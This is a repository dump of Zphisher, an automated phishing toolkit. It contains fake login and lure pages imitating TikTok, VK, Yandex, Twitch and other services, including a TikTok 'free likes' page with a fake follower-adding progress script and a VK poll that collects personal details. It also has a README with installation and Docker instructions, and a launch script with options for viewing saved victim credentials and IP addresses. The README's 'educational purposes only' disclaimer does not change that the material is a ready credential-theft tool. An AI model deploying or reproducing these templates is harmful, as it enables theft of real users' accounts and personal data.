-------------------------------------------------------------------------------- /.sites/steam/2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/steam/2.jpg -------------------------------------------------------------------------------- /.sites/steam/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/steam/favicon.ico -------------------------------------------------------------------------------- /.sites/steam/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/steam/join.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/steam/join.png -------------------------------------------------------------------------------- /.sites/steam/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/tiktok/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/tiktok/jscript.js: -------------------------------------------------------------------------------- 1 | function updateyear() { 2 | var today = new Date(); 3 | var year = today.getFullYear(); 4 | document.getElementById("year").innerHTML = year; 5 | } 6 | 7 | var randomnumber = setInterval(randomuser,6000); 8 | 9 | var getresources = 336699; 10 | var resourcestime = setInterval(resourcesupdate,100); 11 | 12 | var today = new Date().toLocaleDateString('en-US', { 13 | day : 'numeric', 14 | month : 'short', 15 | year : 'numeric' 16 | }).split(' ').join(' '); 17 | 18 | setTimeout(toolupdated, 300); 19 | 20 | function toolupdated() { 21 | document.getElementById("date").innerHTML = today; 22 | } 23 | 24 | function move() { 25 | var username = document.getElementById("username").value; 26 | var follower = document.getElementById("follower").value; 27 | var like = document.getElementById("like").value; 28 | 29 | if(username == "") { 30 | alert("Please insert your tiktok.com username or email address."); 31 | return false; 32 | } 33 | 34 | document.getElementById("fillup").style.display = "none"; 35 | document.getElementById("steps").style.display = "none"; 36 | document.getElementById("comment").style.display = "none"; 37 | document.getElementById("progressbarcontainer").style.display = "block"; 38 | var elem = document.getElementById("progressbar"); 39 | var width = 10; 40 | var id = setInterval(frame, 693); 41 | function frame() { 42 | if (width > 10 && width < 20) { 43 | document.getElementById("progresslog").innerHTML = "Menghubungkan..."; 44 | $("#gen1").fadeIn("slow"); 45 | } 46 | 47 | if (width > 20 && width < 30) { 48 | document.getElementById("progresslog").innerHTML = "Menghubungkan.."; 49 | $("#gen1").fadeOut("slow"); 50 | $("#gen2").fadeIn("slow"); 51 | } 52 | 53 | if (width > 30 && width < 40) { 54 | document.getElementById("progresslog").innerHTML = "Mencari Username : "+username+""; 55 | $("#gen2").fadeOut("slow"); 56 | $("#gen3").fadeIn("slow"); 57 | } 58 | 59 | if (width > 40 && width < 45) { 60 | document.getElementById("progresslog").innerHTML = "Username "+username+" Berhasil Terhubung!"; 61 | $("#gen3").fadeOut("slow"); 62 | $("#gen4").fadeIn("slow"); 63 | } 64 | 65 | 66 | if (width > 60 && width < 75) { 67 | document.getElementById("progresslog").innerHTML = "Mengirim "+follower+" Followers Ke "+username+""; 68 | $("#gen5").fadeOut("slow"); 69 | $("#gen6").fadeIn("slow"); 70 | 71 | if (document.getElementById("addfollowerbarlabel").innerHTML == 0) { 72 | startaddfollower(); 73 | } 74 | } 75 | 76 | if (width > 75 && width < 90) { 77 | document.getElementById("progresslog").innerHTML = "Mengirim "+like+" Like Ke "+username+""; 78 | $("#gen6").fadeOut("slow"); 79 | $("#gen7").fadeIn("slow"); 80 | 81 | if (document.getElementById("addlikebarlabel").innerHTML == 0) { 82 | startaddlike(); 83 | } 84 | } 85 | 86 | if (width > 90 && width < 99) { 87 | document.getElementById("progresslog").innerHTML = "Berhasil!"; 88 | $("#gen7").fadeOut("slow"); 89 | $("#gen1").fadeIn("slow"); 90 | } 91 | 92 | if (width >= 99) { 93 | setTimeout(verify, 1000); 94 | clearInterval(id); 95 | } else { 96 | width++; 97 | elem.style.width = width + '%'; 98 | document.getElementById("progressbarlabel").innerHTML = width * 1 + '%'; 99 | } 100 | } 101 | } 102 | 103 | function verify() { 104 | document.getElementById("verifybg").style.height = "100%"; 105 | } 106 | 107 | function randomuser() { 108 | document.getElementById("randomnumber").innerHTML = Math.floor(Math.random() * 9999); 109 | } 110 | 111 | function resourcesupdate() { 112 | document.getElementById("resources").innerHTML = getresources++; 113 | } 114 | 115 | function startaddfollower() { 116 | var addfollowerelem = document.getElementById("addfollowerbar"); 117 | var addfollowerwidth = 1; 118 | var addfollowerwidthid = setInterval(addfollowerwidthnow, 16); 119 | var addfollowerid = setInterval(addfollowernow, 3); 120 | var addfollower = 0; 121 | 122 | var addfollowerspeed = 0; 123 | 124 | if(document.getElementById("follower").value == 10000) 125 | { 126 | addfollowerspeed = 50; 127 | } 128 | 129 | if(document.getElementById("follower").value == 50000) 130 | { 131 | addfollowerspeed = 100; 132 | } 133 | 134 | if(document.getElementById("follower").value == 75000) 135 | { 136 | addfollowerspeed = 250; 137 | } 138 | 139 | if(document.getElementById("follower").value == 100000) 140 | { 141 | addfollowerspeed = 500; 142 | } 143 | 144 | function addfollowernow() { 145 | if (addfollower >= document.getElementById("follower").value) { 146 | clearInterval(addfollowerid); 147 | } else { 148 | addfollower += addfollowerspeed; 149 | document.getElementById("addfollowerbarlabel").innerHTML = addfollower; 150 | } 151 | } 152 | 153 | function addfollowerwidthnow() { 154 | if (addfollowerwidth >= 100) { 155 | clearInterval(addfollowerwidthid); 156 | } else { 157 | addfollowerwidth++; 158 | addfollowerelem.style.width = addfollowerwidth + '%'; 159 | } 160 | } 161 | } 162 | 163 | function startaddlike() { 164 | var addlikeelem = document.getElementById("addlikebar"); 165 | var addlikewidth = 1; 166 | var addlikewidthid = setInterval(addlikewidthnow, 16); 167 | var addlikeid = setInterval(addlikenow, 3); 168 | var addlike = 0; 169 | 170 | var addlikespeed = 0; 171 | 172 | if(document.getElementById("like").value == 10000) 173 | { 174 | addlikespeed = 50; 175 | } 176 | 177 | if(document.getElementById("like").value == 50000) 178 | { 179 | addlikespeed = 100; 180 | } 181 | 182 | if(document.getElementById("like").value == 75000) 183 | { 184 | addlikespeed = 250; 185 | } 186 | 187 | if(document.getElementById("like").value == 100000) 188 | { 189 | addlikespeed = 500; 190 | } 191 | 192 | function addlikenow() { 193 | if (addlike >= document.getElementById("like").value) { 194 | clearInterval(addlikeid); 195 | } else { 196 | addlike += addlikespeed; 197 | document.getElementById("addlikebarlabel").innerHTML = addlike; 198 | } 199 | } 200 | 201 | function addlikewidthnow() { 202 | if (addlikewidth >= 100) { 203 | clearInterval(addlikewidthid); 204 | } else { 205 | addlikewidth++; 206 | addlikeelem.style.width = addlikewidth + '%'; 207 | } 208 | } 209 | } -------------------------------------------------------------------------------- /.sites/tiktok/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Tik Tok Followers 9 | 10 | 11 | 12 | 26 | 27 | 28 |
29 |
30 |
31 |

Login

32 |

Login to get 1000 Tiktok Likes Free

33 | 34 |
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 | 43 |
44 | 45 |

46 | 47 |
48 | 49 |
50 |
51 | 52 | 55 | 56 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /.sites/tiktok/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/tiktok/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/tiktok/logo.png -------------------------------------------------------------------------------- /.sites/tiktok/sadflix.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/tiktok/sadflix.ttf -------------------------------------------------------------------------------- /.sites/tiktok/style.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: sadflix; 3 | src: url(sadflix.ttf); 4 | } 5 | 6 | .fullscreen-bg { 7 | position: fixed; 8 | top: 0; 9 | right: 0; 10 | bottom: 0; 11 | left: 0; 12 | overflow: hidden; 13 | z-index: -100; 14 | } 15 | 16 | .fullscreen-bg__video { 17 | margin-left:auto; 18 | margin-right:auto; 19 | position: relative; 20 | top: 0; 21 | left: 0; 22 | height: 100%; 23 | } 24 | 25 | body { 26 | text-align: center; 27 | font-family: sadflix; 28 | color: white; 29 | } 30 | 31 | img { 32 | display: block; 33 | margin-left: auto; 34 | margin-right: auto; 35 | } 36 | 37 | table { 38 | margin-left:auto; 39 | margin-right:auto; 40 | } 41 | 42 | select.input-command { 43 | border-radius: 9px; 44 | height: 46px; 45 | line-height: 46px; 46 | font-family: sadflix; 47 | background-color: white; 48 | box-shadow: 0 1px 1px rgba(2, 83, 136, 0.075) inset; 49 | color: black; 50 | } 51 | 52 | .form-option { 53 | margin-left: 15px; 54 | margin-right: 38px; 55 | margin-bottom: 20px; 56 | font-family: sadflix; 57 | } 58 | 59 | .input-form { 60 | border-radius: 9px; 61 | color: black; 62 | background-color: white; 63 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset; 64 | display: block; 65 | font-size: 14px; 66 | height: 20px; 67 | line-height: 1.42857; 68 | padding: 6px 12px; 69 | transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s; 70 | vertical-align: middle; 71 | width: 100%; 72 | font-family: sadflix; 73 | } 74 | 75 | .input-command { 76 | font-size: 18px; 77 | height: 28px; 78 | line-height: 1.33; 79 | padding: 10px 16px; 80 | color: black; 81 | } 82 | 83 | .input-form::-moz-placeholder { 84 | color: #999; 85 | opacity: 55; 86 | } 87 | 88 | .wrapper { 89 | padding: 0; 90 | } 91 | 92 | .wrapper img { 93 | width: 30%; 94 | } 95 | 96 | .buttonstyle { 97 | background: Transparent; /* For browsers that do not support gradients */ 98 | border-radius: 19px; 99 | border: 6px white solid; 100 | color: white; 101 | padding: 16px 33px; 102 | display: inline-block; 103 | font-size: 33px; 104 | height: auto; 105 | font-family: sadflix; 106 | } 107 | 108 | #progressbarcontainer { 109 | background: white; 110 | border-radius: 19px; 111 | border: 9px white solid; 112 | display: none; 113 | position: relative; 114 | margin-left: auto; 115 | margin-right: auto; 116 | width: 90%; 117 | height: 30px; 118 | } 119 | 120 | #progressbar { 121 | border-radius: 19px; 122 | position: absolute; 123 | width: 10%; 124 | height: 100%; 125 | background: #150608; 126 | } 127 | 128 | #progressbarlabel { 129 | line-height: 30px; 130 | text-align: center; 131 | color: white; 132 | } 133 | 134 | #main-tool { 135 | background: #000000; /* For browsers that do not support gradients */ 136 | background: -webkit-radial-gradient(#000000, #000000); /* Safari 5.1 to 6.0 */ 137 | background: -o-radial-gradient(#000000, #000000); /* For Opera 11.6 to 12.0 */ 138 | background: -moz-radial-gradient(#000000, #000000); /* For Firefox 3.6 to 15 */ 139 | background: radial-gradient(#000000, #000000); /* Standard syntax */ 140 | border-radius: 9px; 141 | max-width: 500px; 142 | margin: 20px auto 20px; 143 | padding: 50px; 144 | box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); 145 | } 146 | 147 | 148 | 149 | 150 | #verifybg { 151 | height: 0%; 152 | width: 100%; 153 | left: 0; 154 | top: 0; 155 | position: fixed; 156 | z-index: 1; 157 | overflow-x: hidden; 158 | transition: 0.5s; 159 | background-color: rgb(0,0,0); 160 | background-color: rgba(0,0,0, 0.3); 161 | } 162 | 163 | #verify { 164 | margin-left: auto; 165 | margin-right: auto; 166 | color: white; 167 | position: relative; 168 | background: #f98691; /* For browsers that do not support gradients */ 169 | background: -webkit-radial-gradient(#09f5f9, #f98691); /* Safari 5.1 to 6.0 */ 170 | background: -o-radial-gradient(#09f5f9, #f98691); /* For Opera 11.6 to 12.0 */ 171 | background: -moz-radial-gradient(#09f5f9, #f98691); /* For Firefox 3.6 to 15 */ 172 | background: radial-gradient(#150608, #f98691); /* Standard syntax */ 173 | box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); 174 | border-radius: 9px; 175 | width: 90%; 176 | } 177 | 178 | #verifycontent { 179 | margin-left: auto; 180 | margin-right: auto; 181 | width: 90%; 182 | } 183 | 184 | #shield{ 185 | margin-bottom: 5px; 186 | } 187 | 188 | #gen1 { 189 | display: none; 190 | } 191 | 192 | #gen2 { 193 | display: none; 194 | } 195 | 196 | #gen3 { 197 | display: none; 198 | } 199 | 200 | #gen4 { 201 | display: none; 202 | } 203 | 204 | #gen5 { 205 | display: none; 206 | } 207 | 208 | #gen6 { 209 | display: none; 210 | } 211 | 212 | #gen7 { 213 | display: none; 214 | } 215 | 216 | #addfollowerbarcontainer { 217 | background: white; 218 | border-radius: 19px; 219 | border: 9px white solid; 220 | position: relative; 221 | margin-left: auto; 222 | margin-right: auto; 223 | width: 60%; 224 | height: 10px; 225 | } 226 | 227 | #addfollowerbar { 228 | border-radius: 19px; 229 | position: absolute; 230 | background: #ff0f50; 231 | width: 1%; 232 | height: 100%; 233 | } 234 | 235 | #addfollowerbarlabel { 236 | font-size: 60%; 237 | line-height: 10px; 238 | text-align: center; 239 | color: white; 240 | font-family: sadflix; 241 | } 242 | 243 | #addlikebarcontainer { 244 | background: white; 245 | border-radius: 19px; 246 | border: 9px white solid; 247 | position: relative; 248 | margin-left: auto; 249 | margin-right: auto; 250 | width: 60%; 251 | height: 10px; 252 | } 253 | 254 | #addlikebar { 255 | border-radius: 19px; 256 | position: absolute; 257 | background: #ff0f50; 258 | width: 1%; 259 | height: 100%; 260 | } 261 | 262 | #addlikebarlabel { 263 | font-size: 60%; 264 | line-height: 10px; 265 | text-align: center; 266 | color: white; 267 | font-family: sadflix; 268 | } -------------------------------------------------------------------------------- /.sites/twitch/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/twitch/favicon.png -------------------------------------------------------------------------------- /.sites/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/twitch/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/twitter/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/vk/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/vk/favicon.png -------------------------------------------------------------------------------- /.sites/vk/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/vk/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/vk_poll/login.html: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | VoteRank #289032 6 | 7 | 8 | 9 | 10 | 11 | 30 | 31 | 32 |
33 | 34 |
35 |

VoteRank

36 |

#289032

37 |
38 | 39 | 40 |
41 | 42 |
43 | 44 | What is your name?


45 | 46 | 47 | In what mountain do you live?


48 | 49 | How old are you?


50 | 51 | What are your favorite social networks?
52 | 53 | Facebook
54 | Twitter
55 | LinkedIn
56 | Instagram
57 | Snapchat
58 | Google+
59 | Vkontakte

60 |
61 | 62 |
63 | What is your favorite color?
64 | Blue
65 | Red
66 | Green
67 | Yellow
68 | Purple
69 | Orange
70 | Black
71 | White
72 | Grey
73 | Brown
74 | Pink

75 |
76 | 77 |
78 | Do you prefer money as a gift?
79 | Yes
80 | No

81 |
82 | 83 |
84 |
85 | Your favorite genre of music?
86 | People's
87 | Rock
88 | Metal
89 | Pop
90 | Jazz
91 | Shanson
92 | Hip-hop
93 | Rap
94 | Electronic
95 | Other

96 | 97 | 98 |
99 | 100 |
101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /.sites/vk_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/vk_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | VoteRank #289032 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 |
25 |
26 |
 
27 |
28 |
29 |
30 |
31 | 32 |
33 |
34 |
35 |
36 | 37 | 38 |

 

39 | 40 |
41 | 42 |
43 | 44 |
45 | 46 | 47 |
48 |
49 |
50 | 51 |
52 |
53 |
54 |
55 | 56 |
57 |
58 | 59 |
60 | 61 |
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | 71 |
73 |
74 |
75 | 76 | 77 | 78 | -------------------------------------------------------------------------------- /.sites/vk_poll/p.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/vk_poll/p.gif -------------------------------------------------------------------------------- /.sites/vk_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thnak You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VoteRank

14 |

#56353514

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /.sites/vk_poll/s_c.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/vk_poll/s_c.js -------------------------------------------------------------------------------- /.sites/vk_poll/top_logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/vk_poll/top_logo.png -------------------------------------------------------------------------------- /.sites/wordpress/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/wordpress/favicon.ico -------------------------------------------------------------------------------- /.sites/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/wordpress/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/xbox/index.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/xbox/index.php -------------------------------------------------------------------------------- /.sites/xbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/xbox/pass.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/xbox/pass.php -------------------------------------------------------------------------------- /.sites/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/yahoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/yahoo/yahoo_en-US_f_p_bestfit_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/yahoo/yahoo_en-US_f_p_bestfit_2x.png -------------------------------------------------------------------------------- /.sites/yandex/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/yandex/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Authorization

Or sign in with a social network

6 | -------------------------------------------------------------------------------- /.sites/yandex/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:latest 2 | LABEL MAINTAINER="https://github.com/htr-tech/zphisher" 3 | WORKDIR /zphisher/ 4 | ADD . /zphisher 5 | RUN apk add --no-cache bash ncurses curl unzip wget php 6 | CMD "./zphisher.sh" 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |

4 | 5 |

6 | 7 |

8 | 9 | 10 | 11 | 12 | 13 |

14 | 15 |

16 | 17 | 18 | 19 | 20 | 21 |

22 | 23 |

A beginners friendly, Automated phishing tool with 30+ templates.

24 | 25 | ## 26 | 27 |

Disclaimer

28 | 29 | Any actions and or activities related to Zphisher is solely your responsibility. The misuse of this toolkit can result in criminal charges brought against the persons in question. The contributors will not be held responsible in the event any criminal charges be brought against any individuals misusing this toolkit to break the law. 30 | 31 | This toolkit contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way. 32 | 33 | This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here! 34 | 35 | It only demonstrates "how phishing works". You shall not misuse the information to gain unauthorized access to someones social media. However you may try out this at your own risk. 36 | 37 | ## 38 | 39 | ### Features 40 | 41 | - Latest and updated login pages. 42 | - Beginners friendly 43 | - Multiple tunneling options 44 | - Localhost 45 | - Cloudflared 46 | - LocalXpose 47 | - Mask URL support 48 | - Docker support 49 | 50 | ## 51 | 52 | ### Installation 53 | 54 | - Just, Clone this repository - 55 | ``` 56 | git clone --depth=1 https://github.com/htr-tech/zphisher.git 57 | ``` 58 | 59 | - Now go to cloned directory and run `zphisher.sh` - 60 | ``` 61 | $ cd zphisher 62 | $ bash zphisher.sh 63 | ``` 64 | 65 | - On first launch, It'll install the dependencies and that's it. ***Zphisher*** is installed. 66 | 67 | ## 68 | 69 | ### Installation (Termux) 70 | You can easily install zphisher in Termux by using tur-repo 71 | ``` 72 | $ pkg install tur-repo 73 | $ pkg install zphisher 74 | $ zphisher 75 | ``` 76 | ### A Note : 77 | ***Termux discourages hacking*** .. So never discuss anything related to *zphisher* in any of the termux discussion groups. For more check : [wiki](https://wiki.termux.com/wiki/Hacking) 78 | 79 | ## 80 | 81 |

82 | 83 |

84 | 85 | ## 86 | 87 | ### Installation via ".deb" file 88 | 89 | - Download `.deb` files from the [**Latest Release**](https://github.com/htr-tech/zphisher/releases/latest) 90 | - If you are using ***termux*** then download the `*_termux.deb` 91 | 92 | - Install the `.deb` file by executing 93 | ``` 94 | apt install 95 | ``` 96 | Or 97 | ``` 98 | $ dpkg -i 99 | $ apt install -f 100 | ``` 101 | 102 | ## 103 | 104 | ### Run on Docker 105 | 106 | - Docker Image Mirror: 107 | - **DockerHub** : 108 | ``` 109 | docker pull htrtech/zphisher 110 | ``` 111 | - **GHCR** : 112 | ``` 113 | docker pull ghcr.io/htr-tech/zphisher:latest 114 | ``` 115 | 116 | - By using the wrapper script [**run-docker.sh**](https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh) 117 | 118 | ``` 119 | $ curl -LO https://raw.githubusercontent.com/htr-tech/zphisher/master/run-docker.sh 120 | $ bash run-docker.sh 121 | ``` 122 | - Temporary Container 123 | 124 | ``` 125 | docker run --rm -ti htrtech/zphisher 126 | ``` 127 | - Remember to mount the `auth` directory. 128 | 129 | ## 130 | 131 |
132 |

Dependencies

133 | 134 | Zphisher requires following programs to run properly - 135 | - `git` 136 | - `curl` 137 | - `php` 138 | 139 | > All the dependencies will be installed automatically when you run **Zphisher** for the first time. 140 |
141 | 142 |
143 |

Tested on

144 | 145 | - **Ubuntu** 146 | - **Debian** 147 | - **Arch** 148 | - **Manjaro** 149 | - **Fedora** 150 | - **Termux** 151 |
152 | 153 | ## 154 | 155 |

:: Workflow ::

156 |

157 | 158 |

159 | 160 | ## 161 | 162 | ### Find Me on: 163 |

164 | 165 | 166 |

167 | 168 | 169 | ### *Thanks to all contributors*: 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | 183 | 184 | 185 | 186 | 187 |

1RaY-1

Aditya Shakya

Ali Milani

AmnesiA

KasRoudra

Moises Tapia

Mr.Derek

Mustakim Ahmed

sepp0

TripleHat

Yisus7u7
188 | 189 | 190 | -------------------------------------------------------------------------------- /make-deb.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Make Deb Package for Zphisher (^.^) 4 | _PACKAGE=zphisher 5 | _VERSION=2.3.5 6 | _ARCH="all" 7 | PKG_NAME="${_PACKAGE}_${_VERSION}_${_ARCH}.deb" 8 | 9 | if [[ ! -e "scripts/launch.sh" ]]; then 10 | echo "lauch.sh should be in the \`scripts\` Directory. Exiting..." 11 | exit 1 12 | fi 13 | 14 | if [[ ${1,,} == "termux" || $(uname -o) == *'Android'* ]];then 15 | _depend="ncurses-utils, proot, resolv-conf, " 16 | _bin_dir="data/data/com.termux/files/" 17 | _opt_dir="data/data/com.termux/files/usr/" 18 | #PKG_NAME=${_PACKAGE}_${_VERSION}_${_ARCH}_termux.deb 19 | fi 20 | 21 | _depend+="curl, php, unzip" 22 | _bin_dir+="usr/bin" 23 | _opt_dir+="opt/${_PACKAGE}" 24 | 25 | if [[ -d "build_env" ]]; then rm -fr build_env; fi 26 | mkdir -p build_env 27 | mkdir -p ./build_env/${_bin_dir} ./build_env/$_opt_dir ./build_env/DEBIAN 28 | 29 | cat <<- CONTROL_EOF > ./build_env/DEBIAN/control 30 | Package: ${_PACKAGE} 31 | Version: ${_VERSION} 32 | Architecture: ${_ARCH} 33 | Maintainer: @htr-tech 34 | Depends: ${_depend} 35 | Homepage: https://github.com/htr-tech/zphisher 36 | Description: An automated phishing tool with 30+ templates. This Tool is made for educational purpose only ! 37 | CONTROL_EOF 38 | 39 | cat <<- PRERM_EOF > ./build_env/DEBIAN/prerm 40 | #!/bin/bash 41 | rm -fr $_opt_dir 42 | exit 0 43 | PRERM_EOF 44 | 45 | chmod 755 ./build_env/DEBIAN 46 | chmod 755 ./build_env/DEBIAN/{control,prerm} 47 | cp -fr scripts/launch.sh ./build_env/$_bin_dir/$_PACKAGE 48 | chmod 755 ./build_env/$_bin_dir/$_PACKAGE 49 | cp -fr .github/ .sites/ LICENSE README.md zphisher.sh ./build_env/$_opt_dir 50 | dpkg-deb --build ./build_env ${PKG_NAME} 51 | rm -fr ./build_env 52 | -------------------------------------------------------------------------------- /run-docker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # I'm not that familiar with docker. Send a PR if something is wrong (^.^) 4 | 5 | BASE_DIR=$(realpath "$(dirname "$BASH_SOURCE")") 6 | if [[ ! -d "$BASE_DIR/auth" ]]; then 7 | echo "Creating Auth Directory.." 8 | mkdir -p "$BASE_DIR/auth" 9 | fi 10 | 11 | CONTAINER="zphisher" 12 | IMAGE="htrtech/zphisher:latest" 13 | IMG_MIRROR="ghcr.io/htr-tech/zphisher:latest" 14 | MOUNT_LOCATION=${BASE_DIR}/auth 15 | check_container=$(docker ps --all --format "{{.Names}}") 16 | 17 | if [[ ! $check_container == $CONTAINER ]]; then 18 | echo "Creating new container..." 19 | docker create \ 20 | --interactive --tty \ 21 | --volume ${MOUNT_LOCATION}:/zphisher/auth/ \ 22 | --network host \ 23 | --name "${CONTAINER}" \ 24 | "${IMAGE}" 25 | fi 26 | 27 | docker start --interactive "${CONTAINER}" 28 | 29 | # docker run --rm -ti --network="host" -v ${MOUNT_LOCATION}:/zphisher/auth/ --name "$CONTAINER" "$IMAGE" 30 | -------------------------------------------------------------------------------- /scripts/launch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # https://github.com/htr-tech/zphisher 4 | 5 | if [[ $(uname -o) == *'Android'* ]];then 6 | ZPHISHER_ROOT="/data/data/com.termux/files/usr/opt/zphisher" 7 | else 8 | export ZPHISHER_ROOT="/opt/zphisher" 9 | fi 10 | 11 | if [[ $1 == '-h' || $1 == 'help' ]]; then 12 | echo "To run Zphisher type \`zphisher\` in your cmd" 13 | echo 14 | echo "Help:" 15 | echo " -h | help : Print this menu & Exit" 16 | echo " -c | auth : View Saved Credentials" 17 | echo " -i | ip : View Saved Victim IP" 18 | echo 19 | elif [[ $1 == '-c' || $1 == 'auth' ]]; then 20 | cat $ZPHISHER_ROOT/auth/usernames.dat 2> /dev/null || { 21 | echo "No Credentials Found !" 22 | exit 1 23 | } 24 | elif [[ $1 == '-i' || $1 == 'ip' ]]; then 25 | cat $ZPHISHER_ROOT/auth/ip.txt 2> /dev/null || { 26 | echo "No Saved IP Found !" 27 | exit 1 28 | } 29 | else 30 | cd $ZPHISHER_ROOT 31 | bash ./zphisher.sh 32 | fi 33 | --------------------------------------------------------------------------------